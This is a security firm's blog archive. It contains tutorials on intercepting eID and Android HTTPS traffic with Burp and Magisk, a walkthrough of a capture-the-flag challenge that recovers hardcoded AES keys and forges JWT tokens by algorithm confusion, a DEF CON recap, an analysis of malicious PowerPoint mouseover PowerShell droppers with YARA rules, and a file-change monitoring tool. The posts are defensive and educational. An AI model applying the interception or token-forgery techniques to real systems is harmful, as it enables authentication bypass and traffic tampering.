Category Archives: Tools

Intercepting Belgian eID (PKCS#11) traffic with Burp Suite on OS X / Kali / Windows

TL;DR: You can configure Burp to use your PKCS#11 (or Belgian eID) card to set up client-authenticated SSL sessions, which you can then intercept and modify.

This blog post shows how you can easily view and modify your own, local traffic.  In order to complete this tutorial, you still need a valid eID card, and the corresponding PIN code. This article does not mean that there is a vulnerability in PKCS#11 or Belgian eID, it only shows that it is possible for research purposes.

We sometimes come across web applications that are only accessible if you have a valid Belgian eID card, which contains your public/private key. Of course, we still need to intercept the traffic with Burp, so we have to do some setting up. Because I always forget the proper way to do it, I decided to write it down and share it with the internets.

This guide was written for OS X, but I will add information for Windows & Kali too where it differs from OS X. This guide also assumes that you’ve correctly installed your eID card already, which is a whole challenge in itself…

The target

The Belgian Government has created a test page, which can be found here: . Once you click on the “Start Test”, you will be taken to the HTTPS version, which requires your client certificate. After entering your PIN code, you can view the result of the test:

Screen Shot 2018-01-15 at 13.15.41

The first thing to do is set your browser to use Burp as your proxy. This can easily be done by using FoxyProxy (FireFox)/SwitchyOmega (Chrome) or your system-wide proxy (shiver).

After setting up Burp, the site will not be able load your client certificate:

Screen Shot 2018-01-15 at 13.41.47

Configuring Burp

Setting up Burp is not too difficult. The main challenge is finding out the location of the PKCS#11 library file. I’ve listed the locations for OS X, Kali and Windows below.

  1. Insert your eID card into the reader and restart Burp
  2. Go to Project settings -> SSL Tab -> Override user options and click ‘Add’
  3. Host: <empty> (or be specific, if you want)
    Certificate type: Hardware token (PKCS#11)
    Screen Shot 2018-01-15 at 12.43.25
  4. Supply the path of the correct library. Here are some locations:
    1. OS X
      (simlinked to /usr/local/lib/libbeidpkcs11.4.3.5.dylib in my case. There might be multiple versions there, if one doesn’t work, try another)
    2. Windows
      C:\Windows\System32\beid_ff_pkcs11.dll or
      or use the auto search function
    3. Kali
      (see “building from source” below)
  5. If you get “Unable to load library – check file is correct and device is installed”, restart Burp with your eID already plugged in and working in the eID viewer.
  6. Enter your PIN, click refresh and select the Authentication certificate:
    Screen Shot 2018-01-15 at 12.44.15
  7. Optionally, restart FireFox / Burp (this fixed an issue once)

Et voila, we can now use Burp to intercept the traffic:

Screen Shot 2018-01-15 at 13.01.39

Building from source on Kali (Rolling, 2017.3)

Installing the default debian pacakge doesn’t seem to work, so we’ll have to compile from source. You can do this by following the steps listed below.

Note that we’ve had Kali VMs crash on boot after installing the dependencies below and compiling the source. An easy solution is to take a snapshot, compile, and copy over the .so, or use the one we compiled (

> wget
> tar -xvf eid-mw-4.3.3-v4.3.3.tar.gz
> cd eid-mw-4.3.3-v4.3.3
> apt-get install pkg-config libpcsclite-dev libgtk-3-dev libxml2-dev libproxy-dev libssl-dev libcurl4-gnutls-dev
> ./configure && make && make install

After these steps, you can find the .so library at /usr/local/lib/

About the author

Jeroen Beckers is a mobile security expert working in the NVISO Cyber Resilience team. He also loves to program, both on high and low level stuff, and deep diving into the Android internals doesn’t scare him. You can find Jeroen on LinkedIn.


“We are happy to share our knowledge with the community and thus hope you enjoyed the content provided on this article! If you’re interested in receiving dedicated support to help you improve your cyber security capabilities, please don’t hesitate to have a look at the services NVISO offers! We can help you define a cyber security strategy / roadmap, but can also offer highly technical services such as security assessments, security monitoring, threat hunting & incident response ( Want to learn similar techniques? Have a look at the SEC599 SANS class, which was co-authored by NVISO’s experts! (”

Intercepting HTTPS Traffic from Apps on Android 7+ using Magisk & Burp

Intercepting HTTPS traffic is a necessity with any mobile security assessment. By adding a custom CA to Android, this can easily be done. As of Android Nougat, however, apps don’t trust client certificates anymore unless the app explicitly enables this. In this blogpost, we present a new Magisk module, that circumvents this requirement, by automatically adding client certificates to the system-wide trust store, which is by default trusted by all apps.

Basic HTTPS interception

Intercepting HTTPS on Android is a very straight-forward job, which only takes a few steps:

  1. Set Burp as your proxy
  2. Visit http://burp
  3. Install the Burp certificate as a user certificate
  4. Intercept

After following these steps, you can view all HTTPS traffic that is sent through the user’s browser. A more detailed explanation can be found on Portswigger’s website.

In the past, this approach would even work for app traffic as the application would trust all installed user certificate by default. One way to prevent app traffic from being intercepted, is by installing certificate pinning. Certificate pinning means that on each SSL connection the certificates presented by the server will be compared to a locally stored version. The connection will only succeed if the server can provide the correct identity. This is a great security feature, but can be tricky to implement.

Enter Android Nougat

Starting with Android Nougat, apps no longer trust user certificates by default. A developer can still choose to accept user certificates by configuring the networkSecurityConfig attribute in the app’s AndroidManifest.xml file, but by default, they are no longer trusted.

A first approach would be to decompile, modify and recompile the application, which are quite some steps to perform. If the app turns out to have protection against repackaging files, this would also be very difficult. An example of this technique can be found on

A different approach is adding the user certificate to the system store. The system store is located at /system/etc/security/cacerts and contains a file for each installed root certificate.

Screen Shot 2017-12-15 at 16.07.58A very simple solution would be copying the user installed file (found at /data/misc/user/0/cacerts-added) to this folder. This is only possible, however, if the system is mounted as r/w. Now, while it is possible to remount /system and perform the necessary actions, this is a rather dirty solution and some root-detection algorithms will detect this modification.

Using Magisk

Magisk is a “Universal Systemless Interface, to create an altered mask of the system without changing the system itself.” The fact that Magisk doesn’t modify the /system partition makes it a very nice solution for security assessments where the application has enhanced root detection. By activating “Magisk Hide” for the targeted application, Magisk becomes completely invisible.

Magisk also supports custom modules that are fairly easy to create. In order to have any user certificate recognized as system certificates, we made a simple Magisk module which can be found on our github. The logic of the module is very basic:

  1. Find installed user certificates
  2. Add them to the /system/etc/security/cacerts directory

When installed, the content of the Magisk module is mounted on /magisk/trustusercerts/. This folder contains multiple files, but the most important one is the system directory. This directory is automatically merged with the real /system directory, without actually touching the /system partition. As a result, all certificates in /magisk/trusteusercerts/etc/security/ will end up in /system/etc/security.

Using the module is easy:

  1. Install the module
  2. Install certificates through the normal flow
  3. Restart your device

After installation, the certificates will show up in your system wide trust store and will be trusted by applications:



Of course, if the application has implemented SSL Pinning, you still won’t be able to intercept HTTPS traffic, but this little module makes Android Nougat apps perform the same way as pre-Android Nougat apps.

If you have any suggestions on how to improve this module, or any ideas on how to add the ability to disable SSL Pinning on the Magisk level, let us know!

Download Magisk Module from Github

About the author

Jeroen Beckers is a mobile security expert working in the NVISO Cyber Resilience team. He also loves to program, both on high and low level stuff, and deep diving into the Android internals doesn’t scare him. You can find Jeroen on LinkedIn.

Hack Our Train

This year, in an effort to raise awareness about IoT security, we launched the Hack Our Train challenge. For over three weeks, a model train tirelessly chugged on its tracks inside our IoT village at Co.Station Brussels and then once more for two days at BruCON 2017. We provided it with an emergency brake system powered by IoT technologies and challenged people to hack it and stop the train! With every successful hack, the train stopped, creating a service disruption. A live-stream allowed hackers to monitor the effects of their attacks.

The Hack Our Train challenge was actually composed of two parts: a local one, situated close to the IoT village and then its online counterpart. The local challenge did not require any specific technical skills. It invited people to try and break the pin of the controller that activates the emergency brake mechanism. Check out this video of people having fun with the controller:

But, the online part is where things became really interesting! Over the course of the challenge, only a handful of people succeeded in figuring it out and remotely stopped the train… In this post, we’ll provide a walk-through of the challenge and focus on some of the vulnerabilities featured in it and, more importantly, on ways to fix them.

Hunt for the firmware

On the challenge website, we provided aspiring hackers with the following scenario: Bob, one of the IoT village’s railroad technicians, recently had to update the emergency brake panels. Unfortunately Bob left his USB flash drive laying around and Eve found it and made its content available online!

The first step is to analyze the USB’s contents. It is a zip archive containing two files: firmware.enc, which conveniently hints to the encrypted firmware and a binary file called firmware_updater. The firmware updater is used to decrypt the firmware and then upload it to the control panel via a serial connection.

If we execute it on a Linux machine, the firmware_updater asks us for a pin before decrypting the firmware. People who braved the challenge came up with all sorts of clever ways of cracking the firmware_updater binary and forcing it to decrypt the firmware.

For now, we will resist the temptation of breaking out our dissassemblers and debuggers and we will just look at the strings inside the updater. There are some really interesting parts:



If we think this out (of course, dissassembling would make this much easier), the firmware seems to be encrypted using AES. To perform the decryption ourselves, we would need the key and the initialization vector (IV). Luckily, these are hard-coded into the firmware (see image above).

So, we just need to turn those into their hexadecimal counterparts and we are set:

> openssl enc -aes-128-cbc -d -in firmware.enc -out firmware -iv 766563353667647639396e6e73647161 -K 686f746b3138313965663132676a7671

Vulnerability: use of hardcoded cryptographic keys.

Fix: if possible, avoid using schemes that require hardcoded keys. If using a hardcoded key is unavoidable, there are techniques that can be employed to make the key harder to recover. Ideally, decryption should be performed directly on the embedded device, which avoids the need to expose the key in the firmware updater.

One last word on the update procedure we just cracked: now that we have the keys, no one can stop us from modifying the decrypted firmware to add or remove some functionalities, encrypting it again and uploading it to the device. The emergency controller would have no means of knowing if the firmware has been tampered with.

Vulnerability: firmware not digitally signed.

Fix: Digitally sign the firmware so that the embedded device can verify its authenticity.

Inside the firmware

Phew, we have the firmware, now comes the hard part: we have to reverse engineer it and find a way of remotely trigger the emergency brake mechanism.

Using the file command on the firmware reveals it is in fact a Java archive. This is really good news: using a Java decompiler, we can easily recover the source code.

Vulnerability: code is easy to reverse engineer. Attackers have easy access to the internal workings of the application, which makes it easier for them to find exploits.

Fix: use a code obfuscation tool – there are many available online, both free and commercial. Once you have used the tool on your code, test your application to make sure that it is still functioning correctly. Remember that obfuscation is not a silver bullet but it can drastically increase the effort required for an attacker to break the system.

Before looking at the code, let’s try running the firmware. We are greeted with a status page containing a button to initiate an emergency brake, but we need a pin.


A quick look inside the source code reveals that it is simply “1234”. We have managed to unlock the button. Spoiler: it doesn’t work!

Vulnerability: use of hardcoded passwords.
In our scenario, the password was of no immediate use. Still, this would be harmful if we ever had access to a real emergency brake controller.

Fix: if the password must be stored inside the application, it should at least be stored using a strong one-way hash function. Before hashing, the password should be combined with a unique, cryptographically strong salt value.

In order to understand what is going on, we can simply look at the debug messages conveniently left behind in the console. Seems like the protocol used is MQTT and for some reason, we receive an authentication failure error when we try to perform an emergency brake.

Vulnerability: leftover debug messages containing useful information.

Fix: scan your code for forgotten prints (system.outs in our case) and remove them before release, or disable them at runtime.

Look below the hood

Before going further, let’s take a step back and have a closer look at the architecture of our system. This step was of course not needed to solve the challenge but we thought it complements nicely to this walk-through!

As we just discovered by looking at the source code, communication is based on the MQTT protocol, often found among IoT applications. MQTT works on top of TCP/IP and defines two kinds of entities: Subscribers and Publishers. Publishers send messages on communication channels called Topics. Subscribers can register and read messages on specific Topics. These messages are relayed with the help of a server (also called a Broker).


This is a look below the hood of the mountain (this was our beta setup, our final circuit was much cleaner!). Two elements steal the show: an Arduino and a Raspberry Pi. The Arduino is the muscle: it controls the transistor that stops the train. The Pi is the brains: when it receives an emergency brake message, it orders the Arduino to stop the train.

Both the emergency brake controller (where the firmware runs – it is not shown in the picture) and the Raspberry Pi (shown in the picture) are connected to the internet. They communicate with the MQTT Broker to exchange MQTT messages. The Pi publishes messages concerning the train’s speed but it is also subscribed to a topic waiting for emergency brake messages. The controller displays the train’s current speed and, when the emergency brake is activated, it publishes an emergency brake message that the Broker relays to the Pi.

Of course, not anyone can send an emergency brake message to the server. In our infrastructure, authentication is based on JWT tokens. These are issued by the server relaying the MQTT messages and they are signed using the server’s private key. When  clients try to authenticate using one of those tokens, the server can verify their authenticity using its public key.

To clear all this up, we have created an overview of the MQTT communications going on in the images below:



Tokens, tokens everywhere…

Back the authentication problem. Digging into the source code confirms that authentication is JWT token based. Maybe there is something wrong with the token? Another file inside the JAR that immediately draws our attention is notes.txt. A quick look reveals some notes of a developer that was worried about his JWT token expiring. We can easily verify the creation date of the token here. Seems like out token is really old and as we don’t have the authentication server’s private key, we cannot create a new one.

Vulnerability: old and unused left behind files containing sensitive information.

Fix: before publishing your product, make sure to remove every non-essential ressource.

Knowing how the authentication works, it is time to turn to our favorite search engine for more intelligence. Let’s try jwt token vulnerability. The top result states “Critical vulnerabilities in JSON Web Token libraries“: perfect!

The author does a great job of explaining the vulnerability and how it can be exploited, so we leave you in his hands. For the purposes of this post, the idea is that if we create a forged token using the authentication server’s public key as a HMAC secret key, we can fool the server into verifying it using HMAC instead of RSA, which results in the server accepting our token.


Having identified the vulnerability, it is time to perform our attack. For that, we need the server’s public certificate, which is kindly included in the JAR as well. As mentioned in the notes file, it has been converted to a format compatible with Java but the server is more likely using it in PEM format.

Luckily, converting it back is easy:

> keytool -importkeystore -srckeystore hot.ks -destkeystore temp.p12 -srcstoretype jks -deststoretype pkcs12
> openssl pkcs12 -in temp.p12 -out public.pem


Next, we have to create our malicious token. You can do this in the language of your choice. We used the jwt-simple node.js module.

With the malicious token crafted, we can finally perform the attack. The easiest way is to reuse the code included in the file, conveniently forgotten inside the JAR. We just have to replace the token found in the code, compile the code and execute it from the terminal.

The select few who made it this far in the challenge saw the train stop on the live-stream and received the flag!

Vulnerability: using components with known vulnerabilities.

Fix: apply upgrades to components as they become available. For critical components (for example, those used for authentication), monitor security news outlets (databases, mailing lists etc.) and act upon new information to keep your project up to date.

Lessons learned

Our challenge involved a toy train but the IoT vulnerabilities demonstrated inside are the real deal. We added each one of them to the IoT challenge because we have come across them in the real world.

On a final note, we would like to congratulate those who were able to hack our train and we sincerely hope that all of you enjoyed this challenge!


Staying up to date with the latest hot topics in Security is a requirement for any Security Consultant. Going to conferences is a great way of doing this, as it also gives you the opportunity to speak to peers and get a good view into what the security industry and the researchers are up to.

This year, we sent a small delegation to DEF CON, which is one of the most known Security Conferences in the world. We think everyone should go there at least once in their careers, so this year we sent Michiel, Cédric, Jonas and Jeroen to get their geek-on in Las Vegas!

From left to right: Cédric, Michiel, Jonas and Jeroen ready for their first DEF CON!
Ready to turn off your phones and laptops…

The conference was held at Caesar’s Palace’s conference center, right in the middle of the famous strip. There were four parallel tracks for talks and a lot of different villages and demos throughout the entire conference. We know that What happens in Vegas, Stays in Vegas, but some of these talks were just too good not to share!

Internet of Things (IoT)

There was a large focus on IoT this year, which was great news for us, as we’re actively evolving our IoT skillset. Cédric, our resident IoT wizard, has been running around from talk to talk.

A further update on the IoT track will be provided by Cédric once he is back from holidays 🙂


The amount of talks on Android / iOS was fairly limited, but there were definitely some talks that stood out. Bashan Avi gave a talk on Android Packers. The presentation is very thorough and tells the story of how they used a few of the most popular packers to devise an algorithm for detecting and unpacking variations of the same concept. Their approach is very well explained and could be really interesting for our own APKScan service.

Screen Shot 2017-08-03 at 07.46.16

A typical flow of Android Packers (source)

On Sunday, Stephan Huber and Siegfried Rasthofer presented a talk on their evaluation of 9 popular password managers for Android. Their goal was to extract as much sensitive information as possible on a non-rooted device. Even though you would expect password managers to put some effort into securing their application, it turns out this is rarely the case. The following slide gives a good overview of their results, but be sure to check out the entire paper for more information.

Screen Shot 2017-08-03 at 07.53.18.png

The results of Stephan Huber and Siegfried Rasthofer’s research on Android Password Managers (source)


One of the most interesting talks for us was given by John Sotos (MD). While almost all talks focus on very technical subjects, John gave an introduction on the Cancer Moonshot Project and how creating a gene-altering virus targeted at specific DNA traits is inevitable. This is of course great from a Cancer-treatment point of view, but what if someone would alter the virus to attack different genes? Maybe an extremist vegetarian could make the entire world allergic to meat, or maybe a specific race could be made infertile… In his talk, John explains what could go wrong (and he is very creative!) and how important it is to find a defense against these kinds of viruses even before they actually exist.


Crypto Village

One of our biggest projects within NVISO Labs consists out of building an out-of-band network monitoring device. In the most recent years we’ve seen a lot of the web shift to HTTPS.


While this is definitely a good thing in terms of security, it does limit the possibilities of monitoring network traffic. Malware authors know this as well, and are starting to increasingly adopt TLS/HTTPS in their CnC communications (e.g. the Dridex family). In the crypto village, Lee Brotherston demonstrated various techniques to fingerprint TLS connections and even showed a working PoC. This could allow us to create fingerprints for various malware communications and detect them on the network. More information can be found on Lee’s GitHub page.

Car Hacking Village

When we were looking through the villages available at DEF CON this year, the newest car hacking village immediately caught our attention. In the room were several cars with laptops hooked to the dashboards and people trying to completely take over the controls. In the middle of the room was a brand new Dodge Viper of which the steering controls got reprogrammed to control a video game instead of the actual car. Some of our colleagues even got the chance to test drive it! Although with mixed results …


Jonas learning how to drive a sports car (and not doing a great job 😜).

Packet Hacking Village

The Packet Hacking Village (PHV) is one of the biggest, if not the biggest, village in DEF CON. It’s also the place where Jonas spent a lot of his time, meticulously following talks and taking notes. Different talks could be linked to various steps of the cyber kill chain and were interesting to consider for red teaming assessments or as part of the blue team protecting against these attacks.

One of the presentations that stilled our offensive hunger was given by Gabriel Ryan and discussed wireless post-exploitation techniques. One of the attacks allows to steal AD credentials through a wireless attack using a ‘hostile portal’ that redirects a victim’s HTTP traffic to SMB on the attacker’s machine. This, and his other attacks were facilitated by his own eaphammer tool.

Our blue side was satisfied as well with a talk on Fooling the Hound, which attempts to thwart attackers making use of the BloodHound tool, aimed at visualizing the relationships within an AD environment. His deceptions include fake high-privilege credentials, which increase the shortest path towards a high-value asset. The resulting BloodHound graph showed a greatly increased number of nodes and edges, thereby complicating an attacker’s lateral movements!

Meetup with the CSCBE winners

As you may know, the winners of NVISO’s Cyber Security Challenge 2017 received tickets to DEF CON which was an excellent opportunity to have a little Vegas CSC reunion!


Return to sender

All good things come to and end, and so did the DEF CON conference. We had a really great time in Las Vegas, and everyone made it home safely without losing too much money at the poker table ;-).

Screen Shot 2017-08-03 at 08.15.23

Malicious PowerPoint Documents Abusing Mouse Over Actions

A new type of malicious MS Office document has appeared: a PowerPoint document that executes a PowerShell command by hovering over a link with the mouse cursor (this attack does not involve VBA macros).

In this blogpost, we will show how to analyze such documents with free, open-source tools.

As usual in attacks involving malicious MS Office document, the document is delivered via email to the victims.
(MD5 DD8CA064682CCCCD133FFE486E0BC77C)

Using (a tool to analyze MIME files), we can analyze the email received by the user:


The output indicates that the mail attachment is located in part 5. We select part 5, and perform an HEX/ASCII dump of the first 100 bytes to get an idea which type of file we are dealing with:


A file starting with PK is most likely a ZIP file. So let’s dump this file and pipe into (a tool to analyze ZIP files):


It is indeed a ZIP file. Judging from the filenames in the ZIP file, we can assume it is a PowerPoint file: .pptx or .ppsx.

Using zipdump and option -E (the -E option provides extra information on the type of the contained files), we can get an idea what type of files are contained in this PowerPoint files by looking at the headers and counting how many files have the same header:


So the ZIP files (.pptx or .ppsx) contains 1 JPEG file (JFIF), 11 empty files and 36 XML files.

As said at the beginning, malware authors can abuse the mouseover feature of PowerPoint to launch commands. This can be done with an URL using the ppaction:// protocol to launch a PowerShell command.

To identify if this document abuses this feature, we can use YARA. We defined 2 simple YARA rules to search for the strings “ppaction” and “powershell”:

rule ppaction {
$a = "ppaction" nocase
&amp;lt;p style="text-align: justify;"&amp;gt;rule powershell {
$a = "powershell" nocase

We use to apply the YARA rules on each file contained in the ZIP file:


As shown in the screenshot above, file 19 (ppt/slides/slide1.xml, that’s the first slide of the presentation) contains the string ppaction string, file 21 (ppt/slides/_rels/slide1.xml.rels) contains the string powershell.

Let’s take a look at file 19:


We can see that it contains a a:linkMouseOver element with an action to launch a program (ppaction://program). So this document will launch a program when the user hovers with his mouse over a link. Clicking is not required, as is explained here.

The program to be executed can be found with id rId2, but we already suspect that the program is Powershell and is defined in file 21. So let’s take a look:


Indeed, as shown in the screenshot above, we have a Target=”powershell… command with Id=”rId2″. Let’s extract and decode this command. First we use to extract Target values with a regular expression:


This gives us the URL-encoded PowerShell command (and a second Target value, a name for an .xml file, which is not important for this analysis). With and a bit of Python code, we can use module urllib to decode the URL:


Now we can clearly recognize the PowerShell command: it will download and execute a file. The URL is not completely clear yet. It is constructed by concatenating (+) strings and bytes cast to characters ([char] 0x2F) in PowerShell. Byte 0x2F is the ASCII value of the forward slash (/), so let’s use sed to replace this byte cast by the actual character:


And we can now “perform the string concatenation” by removing ‘+’ using sed again:


We can now clearly see from which URL the file is downloaded, that it is written in the temporary folder with .jse extension and then executed.

To extract the URL, we can use again:


A .jse file is an encoded JavaScript file. It’s the same encoding as for VBE (encoded VBScript), and can be decoded using this tool.


It’s rather easy to detect potentially malicious PowerPoint files that abuse this feature by looking for string ppaction (this string can be obfuscated). The string powershell is also a good candidate to search for, but note that other programs than PowerShell can be used to perform a malicious action.


We produced a video demonstrating a proof-of-concept PowerPoint document that abuses mouse over actions (we will not release this PoC). This video shows the alerts produced by Microsoft PowerPoint, and also illustrates what happens with documents with a mark-of-web (documents downloaded from the Internet or saved from email attachments).

“Zusy” PowerPoint Malware Spreads Without Needing Macros:
Tools used:

Using to detect files touched by malware

Yesterday, we released – a tool you can use to detect unwanted changes to the file sytem. The tool and documentation is available here:

Binsnitch can be used to detect silent (unwanted) changes to files on your system. It will scan a given directory recursively for files and keep track of any changes it detects, based on the SHA256 hash of the file. You have the option to either track executable files (based on a static list available in the source code), or all files. can be used for a variety of use cases, including:

  • Use to create a baseline of trusted files for a workstation (golden image) and use it again later on to automatically generate a list of all modifications made to that system (for example caused by rogue executables installed by users, or dropped malware files). The baseline could also be used for other detection purposes later on (e.g., in a whitelist);
  • Use to automatically generate hashes of executables (or all files if you are feeling adventurous) in a certain directory (and its subdirectories);
  • Use during live malware analysis to carefully track which files are touched by malware (this is the topic of this blog post).

In this blog post, we will use during the analysis of a malware sample (VirusTotal link:

A summary of options available at the time of writing in

usage: [-h] [-v] [-s] [-a] [-n] [-b] [-w] dir

positional arguments:
  dir               the directory to monitor

optional arguments:
  -h, --help        show this help message and exit
  -v, --verbose     increase output verbosity
  -s, --singlepass  do a single pass over all files
  -a, --all         keep track of all files, not only executables
  -n, --new         alert on new files too, not only on modified files
  -b, --baseline    do not generate alerts (useful to create baseline)
  -w, --wipe        start with a clean db.json and alerts.log file

We are going to use to detect which files are created or modified by the sample. We start our analysis by creating a “baseline” of all the executable files in the system. We will then execute the malware and run again to detect changes to disk.

Creating the baseline


Command to create the baseline of our entire system.

We only need a single pass of the file system to generate the clean baseline of our system (using the “-s” option). In addition, we are not interested in generating any alerts yet (again: we are merely generating a baseline here!), hence the “-b” option (baseline). Finally, we run with the “-w” argument to start with a clean database file.

After launching the command, will start hashing all the executable files it discovers, and write the results to a folder called binsnitch_data. This can take a while, especially if you scan an entire drive (“C:/” in this case).


Baseline creation in progress … time to fetch some cheese in the meantime! 🐀 🧀

After the command has completed, we check the alerts file in “binsnitch_data/alerts.log”. As we ran with the “-b” command to generate a baseline, we don’t expect to see alerts:

Capture 2.PNG

Baseline successfully created! No alerts in the file, as we expected.

Looks good! The baseline was created in 7 minutes.

We are now ready to launch our malware and let it do its thing (of-course, we do this step in a fully isolated sandbox environment).

Running the malware sample and analyzing changes

Next, we run the malware sample. After that, we canrun again to check which executable files have been created (or modified):


Scanning our system again to detect changes to disk performed by the sample.

We again use the “-s” flag to do a single pass of all executable files on the “C:/” drive. In addition, we also provide the “-n” flag: this ensures we are not only alerted on modified executable files, but also on new files that might have been created since the creation of the baseline. Don’t run using the “-w” flag this time, as this would wipe the baseline results. Optionally, you could also add the “-a” flag, which would track ALL files (not only executable files). If you do so, make sure your baseline is also created using the “-a” flag (otherwise, you will be facing a ton of alerts in the next step!).

Running the command above will again take a few minutes (in our example, it took 2 minutes to rescan the entire “C:/” drive for changes). The resulting alerts file (“binsnitch_data/alerts.log”) looks as following:


Bingo! We can clearly spot suspicious behaviour now observing the alerts.log file. 🔥

A few observations based on the above:

  • The malware file itself was detected in “C:/malware”. This is normal of-course, since the malware file itself was not present in our baseline! However, we had to copy it in order to run it;
  • A bunch of new files are detected in the “C:/Program Files(x86)/” folder;
  • More suspicious though are the new executable files created in “C:/Users/admin/AppData/Local/Temp” and the startup folder.

The SHA256 hash of the newly created startup item is readily available in the alerts.log file: 8b030f151c855e24748a08c234cfd518d2bae6ac6075b544d775f93c4c0af2f3

Doing a quick VirusTotal search for this hash results in a clear “hit” confirming our suspicion that this sample is malicious (see below). The filename on VirusTotal also matches the filename of the executable created in the C:/Users/admin/AppData/Local/Temp folder (“A Bastard’s Tale.exe”).

Screen Shot 2017-05-17 at 00.28.05.png

VirusTotal confirms that the dropped file is malicious.

You can also dive deeper into the details of the scan by opening “binsnitch_data/data.json” (warning, this file can grow huge over time, especially when using the “-a” option!):


Details on the scanned files. In case a file is modified over time, the different hashes per file will be tracked here, too.

From here on, you would continue your investigation into the behaviour of the sample (network, services, memory, etc.) but this is outside the scope of this blog post.

We hope you find useful during your own investigations and let us know on github if you have any suggestions for improvements, or if you want to contribute yourself!

Squeak out! 🐁